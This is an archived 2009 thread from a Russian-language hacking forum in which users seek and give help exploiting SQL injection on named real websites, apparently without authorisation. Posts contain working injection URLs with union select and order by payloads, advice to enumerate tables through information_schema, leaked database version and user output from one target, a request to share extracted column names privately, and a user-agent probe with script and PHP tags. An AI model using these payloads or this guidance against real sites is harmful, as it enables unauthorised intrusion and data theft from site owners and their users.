ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.03.2009, 19:05
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Сообщение от j0ker13
2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)
))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)
Я считал, что слепая скуля, это когда вывод ошибок отключён.Например возвращает разные результаты, а не обязательно интуицией.Если ошибаюсь-поправьте, я далеко не спец.
И ещё,я попросил помочь раскрутить, а не советы.Что это скуля я знаю и так.А блинд она или нет, это другой вопрос вроде.
Версия 5.0.67-community, больше ничего не узнал =(
|
|
|
17.03.2009, 18:51
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
так не ругается
Код:
http://texeyes.com/contact.php?d=5+union+select+1,2,3,4,5,6+--+
А так идет перенаправление
Код:
http://texeyes.com/contact.php?d=5+order+by+1+--+
Может по union select побрутить? |
|
|
|
17.03.2009, 19:14
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
2 Imperrous
так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
|
|
|
|
17.03.2009, 19:19
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Сообщение от jangle
2 Imperrous
так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
Да ну я не совсем уж нуб.Версию узнал со скули с другого сайта на серваке, но дело в том, что с неё ничего не вытянешь.Доступа к мускул.юзер нет, файл прив отключён, таблиц с админскими и юзерскими данными тоже нет, один мусор и всего то пару таблов.
|
|
|
|
17.03.2009, 21:53
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
|
|
|
|
17.03.2009, 21:57
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от S[N]EP
а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
Нет ЭТО не уязвимость.
|
|
|
|
17.03.2009, 22:51
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Почему при заходе в http://video.antichat.ru с юзер агентом <script></script> и <?php?> (только с тегами script и пхп) выпадает 500 ошибко, как я понимаю 500 ошибку может быть вызывать и скрипт(не обязательно само по) который как то выпадает в зависимости от настроек, или это типа такая зашита?
Последний раз редактировалось PaCo; 17.03.2009 в 22:55..
|
|
|
|
17.03.2009, 23:44
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
|
|
|
|
18.03.2009, 01:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от S[N]EP
Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
нет, это значит, что в скрипте ошибка или просто слетели настройки, и функция mysql_connect() вызывается без параметров.
|
|
|
|
18.03.2009, 10:35
|
|
Новичок
Регистрация: 14.03.2009
Сообщений: 4
Провел на форуме:
22048
Репутация:
6
|
|
hi there
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*
portbld-freebsd6.2
nbt@localhost
4.0.27
nbt
дальше не идет... не могу получить имена столбцов в таблице.
у кого получится, киньте в личку, как сделали...
Последний раз редактировалось lalala23; 18.03.2009 в 11:02..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1176359){kind=avatar}
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1176520){kind=avatar}
Похожие темы
Комбинированный вид